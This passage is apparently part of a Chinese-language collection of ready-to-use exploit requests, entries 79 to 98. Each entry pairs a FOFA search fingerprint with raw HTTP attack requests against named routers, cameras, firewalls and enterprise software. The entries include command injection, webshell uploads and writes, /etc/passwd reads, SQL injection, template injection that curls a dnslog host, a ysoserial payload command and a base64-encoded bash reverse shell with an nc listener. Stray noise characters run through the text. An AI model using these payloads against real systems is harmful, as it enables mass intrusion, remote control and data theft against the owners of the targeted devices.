------YsOxWxSvj1KyZow1PTsh98fdu6l--
2 O* R; ~1 r! h: `9 Y8 s7 j" X+ l; |1 f
+ K2 i+ Y3 i3 l3 c: B
GET /Applications/SkillDevelopAndEHS/YsOxWxSvj1KyZow1PTsh98fdu6l.txt HTTP/1.1, ^& [) i4 Q$ f) n) K
Host: x.x.x.x
8 \1 i$ j2 ~/ T# s1 J' F( b# M5 q
. V/ n8 T# L# W, w, y2 W* M( v1 s# ?
79. BYTEVALUE 百为流控路由器远程命令执行
2 X( n$ e- [( S g7 N" AFOFA:BYTEVALUE 智能流控路由器# J) p3 ?, _6 T* x3 k! h4 _# |
GET /goform/webRead/open/?path=|id HTTP/1.1) m& m" S5 J/ d5 K( ~* j( C
Host:IP M O9 J4 b9 V6 m3 X% U
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0* T9 V, d5 e9 ?- k, E# f+ ?; @6 P$ g
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
( |3 h6 p1 i: v4 q$ N1 m5 N" OAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
6 M) I F# q5 x) A7 p k6 b* aAccept-Encoding: gzip, deflate
' d/ D. \5 W( a' A( J% y" ]& aConnection: close
7 ^, n9 h9 |6 E' z2 HUpgrade-Insecure-Requests: 1
* y7 _1 M& r6 s8 ]' x# ]: Z1 S. r; z* o
3 W4 p$ m& J0 {1 T) H9 H80. 速达天耀软件DesignReportSave.jsp接口存在任意文件上传, o, `$ y- S1 W( ]4 h
FOFA:app="速达软件-公司产品" D9 t; a+ @# c/ x
POST /report/DesignReportSave.jsp?report=../xykqmfxpoas.jsp HTTP/1.1
+ T4 c+ \; S, R* F% fHost: x.x.x.x
- p2 r! b+ D+ q, GUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
3 v$ g6 Y6 L* J$ U7 @0 F% FContent-Length: 273 {+ T2 Q$ K V& a% c0 f5 c
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
/ `3 `7 t. d. X) E0 M0 DAccept-Encoding: gzip, deflate
/ a. @/ V: w- [( TAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.20 i* P" j7 x) n- c; q. T
Connection: close0 F; v4 C0 T/ V" [! c7 P
Content-Type: application/octet-stream6 h. d& i5 V4 G$ c& N
Upgrade-Insecure-Requests: 1
0 u4 y4 t9 b% l. y: |7 ?* u t% t% N; W3 U3 }1 Q
<% out.print("oessqeonylzaf");%>
a" c, X0 L8 @7 C/ w
$ Z2 g, O6 ~- T# p3 v) ]
' \: E$ {* ?4 u* \GET /xykqmfxpoas.jsp HTTP/1.15 e9 z U' T% ?5 `& y
Host: x.x.x.x. u1 Y0 V, I0 D" U2 A; @% I
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
, L; J2 E$ `+ n, cConnection: close. O: A2 U9 B( S* Y( y7 W
Accept-Encoding: gzip# S7 F( J) _+ U. C
' E6 k3 L4 c" D8 e+ U) r
4 `1 |1 g$ |5 y: w* e( L81. 宇视科技视频监控宇视(Uniview)main-cgi密码泄露
6 F M, v! W% R$ B$ h8 IFOFA:app="uniview-视频监控"
' G9 D& L8 j7 Q+ X7 v5 @- M0 N* xGET /cgi-bin/main-cgi?json={"cmd":255,"szUserName":"","u32UserLoginHandle":-1} HTTP/1.1! V$ A8 t3 o2 S2 m. S9 }
Host: x.x.x.x! M2 U: y1 @4 a: @
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
$ _* r4 ]8 ?+ c; C4 vConnection: close
8 X) C0 y/ @ d9 ^Accept-Encoding: gzip( r1 E! @8 g& s9 {$ C
7 y: }9 j, t; [# {5 L9 Q6 l/ X/ K
82. 思福迪LOGBASE运维安全管理系统 test_qrcode_b 远程命令执行, g, P5 a+ v! s2 K9 k2 E k
FOFA:app="思福迪-LOGBASE"7 ], S$ d: n% o
POST /bhost/test_qrcode_b HTTP/1.1
# p% g; a5 H' N h mHost: BaseURL
$ U5 Q# P% m' M& rUser-Agent: Go-http-client/1.1' j' A2 }( v! f8 k2 q
Content-Length: 23
/ b! x; q, ^5 G* P) ~8 QAccept-Encoding: gzip; Y, c0 ]9 P( `4 `; M8 `& a
Connection: close
* V6 e+ q" k$ Y& h v+ e2 mContent-Type: application/x-www-form-urlencoded
3 w( c* ^" R0 m; s& [Referer: BaseURL
; a) V r: A! s- B1 U- D4 R q! {) W9 \. `6 V
z1=1&z2="|id;"&z3=bhost
) w, n5 O& s0 W# p8 j- }
2 F: y- }; j4 C* l" k b s, z# V
# M% a/ p7 q1 C- k5 p83. JeecgBoot testConnection 远程命令执行
2 z$ d) X* b% o( j. ^% F4 {FOFA:title=="JeecgBoot 企业级低代码平台"
- C! {$ E/ y( z' ]" R" ?5 V. [: P( j. T: c* W: K- u
2 O$ |# r) ?5 i) S6 v0 n6 B7 aPOST /jmreport/testConnection HTTP/1.1
0 j% y2 d/ _9 Z7 }: K! b7 {5 j3 GHost: x.x.x.x
' {6 i2 R! i" ?8 @! t+ CUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.152 Z$ |# B+ h& X9 e& h1 L1 L7 S
Connection: close9 g5 f+ e n( B7 F3 m; k
Content-Length: 8881
: U# G! B# |( x6 WAccept-Encoding: gzip
7 A4 O4 D1 q& g Y. QCmd: echo "2ZTvHsq4au3uOQ2mK9OuJb86rdO"
8 h/ L7 o" t; W: b) z3 _Content-Type: application/json
7 M. n, }7 \1 C4 a+ w0 q
$ }1 Z2 B+ s: s6 e3 x3 c' `PAYLOAD
; u6 H3 A" S5 q5 C7 b) v: |5 T6 W/ l- s# P
84. Jeecg-Boot JimuReport queryFieldBySql 模板注入+ s! _% J& j/ H$ f7 O+ H
FOFA:title=="JeecgBoot 企业级低代码平台"
/ L0 z7 e. f5 d6 O" H, N; T1 J% Q" |$ v9 z: F* G0 n
' E, a. ~7 B8 u( t6 p4 I: h8 V! D3 S# q- S
POST /jeecg-boot/jmreport/queryFieldBySql HTTP/1.1, @8 E/ c n- m- C H+ w1 D) y E
Host: 192.168.40.130:8080
' f9 q& T+ x3 G' W: jUser-Agent: curl/7.88.1+ [- `% g, v% V4 f. Y9 j
Content-Length: 156! ]9 {/ N3 O! k* U; e. {2 B
Accept: */*' H/ n, A) L! f! T
Connection: close: h+ P& E4 {% u) N- U
Content-Type: application/json s5 |, ~. n; _. n( g
Accept-Encoding: gzip" W" s# p0 k8 y, d
0 r$ V) e" \" ^" C2 {{
5 _1 `! ?+ W: j" }# p! D9 s" V- R+ [7 @ "sql": "<#assign ex=\"freemarker.template.utility.Execute\"?new()>${ex(\"curl http://ip.port.kr9dqoau.dnslog.pw/`whoami\")}",& m9 P; ]) e8 l5 _' B$ d
"type": "0"
* D' K+ |( `) Z' O* ^}, V- `/ w: J' `7 ^2 I. X
2 y# y- m) O+ {" ~( N% s* z
, }. ^$ X- }; u/ C! ]85. SysAid On-premise< 23.3.36远程代码执行
) K7 H$ s! D) ~! fCVE-2023-47246
" k: X6 _$ d: N% l9 M( JFOFA:body="sysaid-logo-dark-green.png" 6 {/ _0 @) d/ t9 ~4 s2 R
EXP数据包如下,注入哥斯拉马. z3 W# F S6 Z5 v+ s5 O
POST /userentry?accountId=../../../tomcat/webapps&symbolName=LDAP_REFRESH_ HTTP/1.18 ]* k3 P& u+ X
Host: x.x.x.x, r k1 [( P3 g. z
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15% @- A- u1 r$ I% Q! x1 M( v
Content-Type: application/octet-stream) T2 |1 k2 [) {: i# l, P1 h8 e* Q
Accept-Encoding: gzip
6 N2 A* E5 r$ N5 O2 H* e* q# k2 f3 X% I2 C$ O! X- s- {3 f
PAYLOAD
3 j. m) z. j0 E& {3 a
9 S3 F% P7 s1 \- K9 b$ I回显URL:http://x.x.x.x/userfiles/index.jsp( [0 Q5 c* B7 o, T# V
' @5 c' A7 O1 K3 i% r1 C
86. 日本tosei自助洗衣机RCE
2 w: @' `! L1 @" p; P, T; L; LFOFA:body="tosei_login_check.php" i% q% s! J0 N5 c4 l& L$ V
POST /cgi-bin/network_test.php HTTP/1.1
2 Q" E) s3 f5 Q" m0 `% S) X" u) r$ XHost: x.x.x.x: U3 z) c/ ^9 i* g
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36$ w2 h0 w/ o) y7 Y8 {& G/ B! F
Connection: close) M: s/ p! b4 F' {
Content-Length: 44
" K4 ?2 L* d6 R1 v4 ?Accept: */*% n( U! G$ i. b3 ?# s
Accept-Encoding: gzip7 n# [" B. D/ d2 I8 c( j0 ~1 A
Accept-Language: en
3 W- l, X: A- gContent-Type: application/x-www-form-urlencoded4 x% p) N. z: Q' V
# T+ ]3 `; k3 |& H
host=%0acat${IFS}/etc/passwd%0a&command=ping w5 C- U# ]3 Z3 L% O' e
4 l" d8 B) ?& \2 a
; a) I" Q: M/ G2 O87. 安恒明御安全网关aaa_local_web_preview文件上传, r& E# _6 m7 ?: w& u* X0 ?
FOFA:title="明御安全网关"; y$ q7 x' c( I& ]" ^9 ^2 ]+ L
POST /webui/?g=aaa_local_web_preview&name=123&read=0&suffix=/../../../jfhatuwe.php HTTP/1.1
! n% L1 z( X5 a; c# w5 |' C8 o6 EHost: X.X.X.X
5 E' \" i* L1 E$ rUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15, M+ E. o( t/ F
Connection: close5 K. ]7 q. ]) ]7 O
Content-Length: 198
% N6 i4 B4 U% KAccept-Encoding: gzip
- d0 @* w) E, x# e/ h fContent-Type: multipart/form-data; boundary=qqobiandqgawlxodfiisporjwravxtvd# e+ \- g1 e' c% x' X% g
, ]! G1 j% t2 }+ G0 r6 N+ H% x
--qqobiandqgawlxodfiisporjwravxtvd( J* ^- |* j( s
Content-Disposition: form-data; name="123"; filename="9B9Ccd.php"3 K2 H/ G3 V- N
Content-Type: text/plain
. N. g- l" a% @. `! M
* q3 e+ m& K3 s" \6 M* R2ZqGNnsjzzU2GBBPyd8AIA7QlDq% t4 {% l5 S* R2 B2 I
--qqobiandqgawlxodfiisporjwravxtvd--1 B% b' k& S3 ]3 v! v3 m
& [2 F: H1 r# K' N
) q3 ^9 f5 g, H( z/jfhatuwe.php
2 Z0 d" y# |9 q4 M0 ~& a2 S3 r* d g3 |; G- L8 W
88. 安恒明御安全网关 aaa_portal_auth_config_reset 远程命令执行
7 s" o% q: O, CFOFA:title="明御安全网关"
' T* Y F* O! z) tGET /webui/?g=aaa_portal_auth_config_reset&type=%0aecho%20%27%3C%3Fphp%20echo%20%22assdwdmpidmsbzoabahpjhnokiduw%22%3B%20phpinfo%28%29%3B%20%3F%3E%27%20%3E%3E%20%2Fusr%2Flocal%2Fwebui%2Ftxzfsrur.php%0a HTTP/1.1, ~: I5 J3 H* D8 B0 `
Host: x.x.x.xx.x.x.x/ [0 n1 Z3 q4 q: n) x* L
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15- }. Q% k2 S" d
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
- k7 m i; N6 ^3 L5 Y' e+ U, r* W- LAccept-Encoding: gzip, deflate
8 {, \. O+ l% D' MAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
8 `0 A1 M/ E+ a6 T- L3 gConnection: close
% s$ C! h7 E) \
% s6 f- o' X! P0 h/ t+ @, N2 X6 {6 D: Y9 q
/astdfkhl.php
. S" v0 f* V7 n+ n2 M! y! e+ D. B) L: @
89. 致远互联FE协作办公平台editflow_manager存在sql注入9 ]2 P R, Y9 p1 q
FOFA:title="FE协作办公平台" || body="li_plugins_download"
3 w, V: w7 w$ z, Q; J3 PPOST /sysform/003/editflow_manager.js%70 HTTP/1.1 w) s! ]8 ?& d7 B, j
Host: x.x.x.x) ^ ^ P1 i7 r: U1 P% Z7 F
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
4 n7 p# `) r! `7 W- sConnection: close( ~9 j7 t- w+ z m2 W- y
Content-Length: 41$ j0 X3 x. o' Q9 k5 t, n$ w& V( M
Content-Type: application/x-www-form-urlencoded+ J( q1 ~/ M1 p7 }3 w0 {
Accept-Encoding: gzip, g3 `) L/ I( s- S9 k! g: A# ]
x& @% d X' k% P: j0 ~option=2&GUID=-1'+union+select+111*222--+( u- m1 @8 C U
+ g* R# N* R2 ?7 I. }. N
6 r! k2 R- W: s G0 \
90. 海康威视IP网络对讲广播系统3.0.3_20201113_RELEASE远程命令执行3 x: P. P3 G# H) V w% o
FOFA:icon_hash="-1830859634"
5 y8 W+ B) _* s1 z6 vPOST /php/ping.php HTTP/1.1
+ H3 H3 {) R* D& x. `Host: x.x.x.x- C( U. P* C/ A
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
; o5 N7 |& P6 g3 [7 z4 D. [; i# SContent-Length: 51- z$ r/ H5 O% C$ U
Accept: application/json, text/javascript, */*; q=0.01
# Z \( _- j- O) N5 }# [7 xAccept-Encoding: gzip, deflate
r/ M1 m3 w3 e( n7 u( w2 ^Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
/ h& \% P) i. T3 fConnection: close7 G! [" {2 J* |
Content-Type: application/x-www-form-urlencoded
2 _+ U. F$ V7 j: O. b2 ?* HX-Requested-With: XMLHttpRequest- U& v0 Y" U+ q6 J; y$ B
9 X9 t$ j: M! f+ k. i; q) A
jsondata%5Btype%5D=99&jsondata%5Bip%5D=ipconfig! J, J' ^( v6 v9 A" T
1 W# z s4 M6 w, A, G: o
/ n1 e9 X& U8 s q0 ~0 C91. 海康威视综合安防管理平台orgManage/v1/orgs/download任意文件读取) X0 ], B: O( } M+ M$ i: y
FOFA:title="综合安防管理平台"# K. N8 R- U# ~8 ]4 T @/ S
GET /center/api/task/..;/orgManage/v1/orgs/download?fileName=../../../../../../../etc/passwd HTTP/1.15 u. Y2 r1 G" h$ G' e; m
Host: your-ip
, Z6 Y7 \! M3 G# s6 MUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36* {. h' y$ S8 O5 e* ?0 i
Accept-Encoding: gzip, deflate6 Z( e- Y: o! l' ?: e5 u w
Accept: */*4 ]' x3 K- @6 o, a; r
Connection: keep-alive
" v+ b/ F& g( O/ s
3 B8 T i2 T$ e' h' ]& \, U! i. b2 z, T3 Q4 G; X' U& S: O
3 P2 @, c) V: p% k6 L
92. 海康威视运行管理中心session命令执行0 T/ l7 ]) C8 D0 i. r
Fastjson命令执行3 l5 Z2 `9 D, Z& n" J
hunter:web.icon=="e05b47d5ce11d2f4182a964255870b76"8 G4 [6 k7 f4 @# Y: ^$ X& K+ e
POST /center/api/session HTTP/1.14 u# V& D' N: u
Host:" A. d- C; C `1 a- t6 Q
Accept: application/json, text/plain, */* n" {$ Z! g6 D/ {
Accept-Encoding: gzip, deflate
+ }* g, p8 }: T% IX-Requested-With: XMLHttpRequest
& j7 O5 o0 x# v$ G2 c. [' @3 ]: SContent-Type: application/json;charset=UTF-87 j- \; F3 e: H9 m
X-Language-Type: zh_CN8 A( ?6 s- G1 G) l/ N, |! a9 v" D1 c
Testcmd: echo test
+ F; y( S" t; h: E8 kUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X -1_0_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
# H: @7 L' k3 e; j# f mAccept-Language: zh-CN,zh;q=0.9+ ?- A# x1 l' k8 l* m3 b
Content-Length: 57780 \) v5 m8 x/ R' J8 a! r& t
: N$ c6 ^& W% o5 C! v+ OPAYLOAD" e% S' X& m# b6 P8 ^
* z1 e" j( V7 R- p6 g3 y' W
$ a" b% \0 v( k' Y93. 奇安信网神SecGate3600防火墙app_av_import_save任意文件上传# i/ F c0 o- q! Y+ ]
FOFA:fid="1Lh1LHi6yfkhiO83I59AYg=="& b' r/ Y0 Q p
POST /?g=app_av_import_save HTTP/1.1
! ^' Q N4 T8 B5 Q( k/ RHost: x.x.x.x
; G" I) x3 n# l* U% m7 q: W7 BContent-Type: multipart/form-data; boundary=----WebKitFormBoundarykcbkgdfx5 c# P& y4 s0 X4 A2 k: d6 b3 B+ @3 j) Q5 _
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
# I. R: |' k, c* N4 x& w
7 B$ @, A) h' C8 O------WebKitFormBoundarykcbkgdfx
3 m7 I: L, H: X$ X( ] fContent-Disposition: form-data; name="MAX_FILE_SIZE"6 t r7 P& q! R# M
$ T" [$ A! m R+ s0 o
10000000
* `! l3 r, n# B: S------WebKitFormBoundarykcbkgdfx- r( G. v( v0 u) b( {
Content-Disposition: form-data; name="upfile"; filename="xlskxknxa.txt": Y1 h! a( q: H% y
Content-Type: text/plain. f8 u5 S4 Y% S* y- E+ p: g
% a0 r/ j! x y) i, L1 n) e- Z+ Dwagletqrkwrddkthtulxsqrphulnknxa o" ?/ D# V; F) [( U
------WebKitFormBoundarykcbkgdfx
/ l- j, w& D. G6 @3 R+ TContent-Disposition: form-data; name="submit_post"
* R5 s5 `; V0 R* E9 G0 g- C
$ M" d' c. M- B/ @3 p' Jobj_app_upfile
5 H6 T% Z: `0 f. O, y6 r6 M. ~------WebKitFormBoundarykcbkgdfx
5 A1 d& w* m* d: u6 P& xContent-Disposition: form-data; name="__hash__"
, Q3 K/ f' C/ Q' k) c+ o3 }" u- A0 k) f' ?, b7 V* H% U
0b9d6b1ab7479ab69d9f71b05e0e9445: X5 k: I( X8 ~8 T1 \
------WebKitFormBoundarykcbkgdfx--) P9 }$ k4 z# `3 N
6 @, B" L$ ?. s
4 p3 x# z0 w+ o7 I- N2 G) k
GET /attachements/xlskxknxa.txt HTTP/1.1, W9 X- ]. B! z9 t
Host: xx.xx.xx.xx# l5 y- U# ^% a0 q2 C. X
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36. s! g' p% J" f6 T1 @
) u$ v& d2 m' S; N, |1 j' p6 w( p# l' j* S9 F
94. 奇安信网神SecGate3600防火墙obj_area_import_save任意文件上传
1 x: Q( F- g0 i4 n9 h# Y- XFOFA:fid="1Lh1LHi6yfkhiO83I59AYg=="2 K3 V% ]) i# g a' l8 R, o
POST /?g=obj_area_import_save HTTP/1.1
) l0 d6 P1 \! X/ pHost: x.x.x.x5 I/ u2 P0 H+ y% _" B1 I, h* ` r$ r
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarybqvzqvmt3 j+ V6 Q, ?. K2 E/ T$ S( q1 P5 ]
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36+ w* |$ [, s$ W2 x+ r! C0 l
$ _, o9 K4 E8 c4 _# V9 q% V# k' U
------WebKitFormBoundarybqvzqvmt
' t; n+ T9 W7 |1 c# ZContent-Disposition: form-data; name="MAX_FILE_SIZE"
; B' w2 c& U% Q. ?/ k5 r6 o% ^( f2 z( Y+ d
10000000
" a; I9 j3 j' r$ Q. e/ s------WebKitFormBoundarybqvzqvmt2 e, u k( F) `( F4 q; a3 r0 C
Content-Disposition: form-data; name="upfile"; filename="cciytdzu.txt"% ]0 Y+ I# v9 N9 g3 ? p
Content-Type: text/plain. @3 W9 g! J$ c$ }" T
% g5 n ~% ?9 B: w# epxplitttsrjnyoafavcajwkvhxindhmu6 A5 O3 X- W l) D. G
------WebKitFormBoundarybqvzqvmt
" U: `! p2 i6 @$ kContent-Disposition: form-data; name="submit_post"- ^% L. j+ a: X+ N* S' Y6 H, ^
3 E2 ~/ |0 p7 |9 ]- Y' v8 V* {0 E8 I
obj_app_upfile
! D( D9 a4 o9 U! y------WebKitFormBoundarybqvzqvmt
! }' q* z8 v! v; dContent-Disposition: form-data; name="__hash__"( y. v4 j. @ `- R
( f3 i7 V0 h2 C$ q; @0b9d6b1ab7479ab69d9f71b05e0e9445+ |9 Q+ E7 S3 r% X, Y
------WebKitFormBoundarybqvzqvmt--7 b5 r# F4 }( K# N" \. V4 C. N
0 J2 j5 v! I3 F X+ Z" Y% ^; W# J+ s$ |; n/ E* {3 \& p
0 N; v/ z( k% g
GET /attachements/xlskxknxa.txt HTTP/1.1
1 P3 v+ H- `3 _/ EHost: xx.xx.xx.xx
e, O i3 @, E, O7 i9 uUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
2 y: k. j, ^" g' o0 A" e8 |1 a' l/ z% Q# ]
' n9 m; o @ s( v: _% m m7 E9 l- d: b% }
95. Apache-OFBiz < 18.12.10 xmlrpc远程代码执行: \0 |: {' \5 ~, y) G( d4 \
CVE-2023-49070( N( @8 \, W/ |( m* s# [* D
FOFA:app="Apache_OFBiz". A5 t9 p6 @! f1 e
POST /webtools/control/xmlrpc;/?USERNAME&PASSWORD=s&requirePasswordChange=Y HTTP/1.1; K9 I! s6 E( h. ~4 B4 p/ {$ c
Host: x.x.x.x' W) r' a7 g1 B) I- C B* M1 t# n6 V8 V
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
9 E4 R6 U# x4 e) z7 WConnection: close' O7 i& t6 ]5 u; G- C
Content-Length: 8891 \. K4 |8 y" w: K' B) W6 `, r
Content-Type: application/xml
; X7 V: I9 }6 z, U- W- z( ~; YAccept-Encoding: gzip
6 B1 W2 \, o' T8 _9 { H* l
5 l7 J* r8 B0 A4 F/ O<?xml version="1.0"?>
1 V7 n6 G" e7 E: u<methodCall> G2 _7 ^# d' r9 B t) I
<methodName>2a4UTp2XBzXgziEO3BIFOCbJiI3</methodName>
( ?& m) m. y6 U6 T& } <params> t# {. H* a4 ~- [) b. E
<param>
6 E2 K5 s( |/ z! n <value>4 m& _6 s5 M) b9 U! [
<struct>, k2 a; O8 o+ K( c0 Q+ O# a6 ]
<member>- P! r p5 V y" w% X$ o9 b
<name>test</name>% L& }* I9 [* c$ S2 X' h; L
<value>4 C! O5 l5 I- P; u( W
<serializable xmlns="http://ws.apache.org/xmlrpc/namespaces/extensions">[payload的base64值]</serializable>9 j6 ?! @4 j8 L, L2 R. [
</value>/ Z8 g4 U4 `; G# l
</member>
3 }4 e' H: T2 E$ V% m0 C% y, H8 k </struct>6 N& f6 f1 ^; m v9 m
</value>
$ `& E+ z4 k) R* {0 c0 v </param>9 W' a2 ^* U: D; a: x) [
</params>/ C- n" t" q$ [% I1 v7 x
</methodCall>
" R k5 @) C" q" }+ `* D0 S
- d" L/ z J0 a+ C) e; \1 x7 k" u& P# d+ ]4 x) Y" {- |
用ysoserial生成payload
+ o7 @) A; a( \$ K1 }7 ^8 z9 c3 L# sjava -jar ysoserial-all.jar CommonsBeanutils1 "ping 41e87zy3.dnslog.pw" | base64 | tr -d "\n"
9 o$ `$ y/ m/ @) w% y2 s4 o9 M; }$ N* k
" c; M& A+ B. o) z% Q b: u将生成的payload替换到上面的POC4 n- P C7 v: }% E. ]
POST /webtools/control/xmlrpc;/?USERNAME&PASSWORD=s&requirePasswordChange=Y HTTP/1.1# m, J& b1 y2 x$ }, Z& P
Host: 192.168.40.130:8443
4 ?' q( y, X* _- z; v& ~User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
& @0 j" X$ N0 V; S8 Q1 w1 |0 b VConnection: close; W2 g0 w9 _5 f
Content-Length: 8891 O! G# x# x9 U+ g+ N( _1 u
Content-Type: application/xml
+ S0 E4 A( w e* }) R h. _Accept-Encoding: gzip
9 g( Z+ _" k3 v
& G3 ?% Y" q) F: MPAYLOAD
- s5 {3 M) |% m* P0 A( |) I$ q7 V9 |2 d' D5 N/ J
96. Apache OFBiz 18.12.11 groovy 远程代码执行" u/ s& ~/ B% U
FOFA:app="Apache_OFBiz"# ~, i( g) s, `! F4 u2 S7 r
POST /webtools/control/ProgramExport/?USERNAME=&PASSWORD=&requirePasswordChange=Y HTTP/1.17 E/ W8 D I H# q" m
Host: localhost:8443; L1 {! n6 q/ t
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0! C3 l; |. N% c+ B4 [/ b4 S/ H3 j& d& [
Accept: */*
8 S' `9 ?, P" i1 \, gAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.28 K' @+ `: v- `, {% O
Content-Type: application/x-www-form-urlencoded
9 q5 p2 L3 p' O9 S$ eContent-Length: 55! o2 h0 A4 [* a9 |% d
: w5 W/ `, K2 L) Z& {$ ~groovyProgram=throw+new+Exception('id'.execute().text);( {5 l% \6 _" T( U) n
" l1 Q6 x* U Q9 ?$ {' F
% t9 g4 D" A/ Z( B! S3 n反弹shell
' P8 X! |. i2 D3 X4 q在kali上启动一个监听
3 d7 c& F+ ?+ M& J3 ync -lvp 7777( g* M* q( v! U$ J2 Y; g# E- i1 f
3 ]- y" w3 E/ z: Q9 RPOST /webtools/control/ProgramExport/?USERNAME=&PASSWORD=&requirePasswordChange=Y HTTP/1.1
. i0 G$ J# ^. g+ x# L& e: rHost: 192.168.40.130:84434 z2 i ~8 w W, N! F
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0( E$ h+ }, d- {" |- ?' L
Accept: */*7 S( N4 o0 w* a4 [) f% X
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.28 W' @+ e2 J7 c- o0 g$ Y8 Q3 V+ C
Content-Type: application/x-www-form-urlencoded1 g' G% u2 X7 a* l
Content-Length: 71
; P0 Q+ Z! [! f
9 B% _1 g0 r+ l9 RgroovyProgram='bash+-c+{echo,YmFzaCUyMC1pJTIwPiYlMjAvZGV2L3RjcC8xOTIuMTY4LjQwLjEyOC83Nzc3JTIwMD4mMQ==}|{base64,-d}|{bash,-i}'.execute();5 f# C$ d9 @* G$ h% m+ f: G0 F% x9 o
- Z* }1 {7 T7 _5 ^9 W% ]7 d8 \, S
97. OneBlog v2.2.2 博客Shiro反序列化远程命令执行0 J' ~$ w/ u( }4 {7 t1 G
FOFA:body="/assets/js/zhyd.tool.js" || body="OneBlog,开源博客"
- q5 U$ v. T L Z+ S& ?8 e) nGET /passport/login/ HTTP/1.1
. x u# w# B e) o* m' M5 E0 GHost: 192.168.40.130:8085( J) H" R: r- J
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15# ~- k& G( ^* u+ x
Accept-Encoding: gzip9 r' {! {% d c, ^
Connection: close- G5 {* l& X8 e! ~1 h( C
Cookie: rememberMe=PAYLOAD
; {' |4 C, S8 s; H# h* y9 CX-Token-Data: echo "2a4MU6FVYI3qR4AWxn1Bdfh6Ttk"
) r* E% x- L J+ _+ z2 f* Q
' }5 C; @$ H, q; S9 H+ w/ x2 P5 ]) Y" W8 D. Z0 H
98. SpiderFlow爬虫平台远程命令执行0 Z& ?8 x4 ?; y# E" m( I
CVE-2024-0195
. U7 y, g9 y* O' YFOFA:app="SpiderFlow"
# e. z4 y) h$ y5 B& ePOST /function/save HTTP/1.1
; z) Y$ n2 L" s1 p8 v+ A% OHost: 192.168.40.130:80882 Y+ [( h4 Y' q A& v
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
! i0 I: U- {( n0 a4 r1 }4 g6 GConnection: close
( A8 z2 v1 n. z- }Content-Length: 121" l, Z S5 c7 \2 g& y
Accept: */*
8 U% N' ]% S: K) n5 K' UAccept-Encoding: gzip, deflate- S3 A e) A$ X
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2$ C m j4 B+ h7 {, k& N
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
' x3 i0 h9 P- t" h8 AX-Requested-With: XMLHttpRequest- h, l. P# v" B/ c
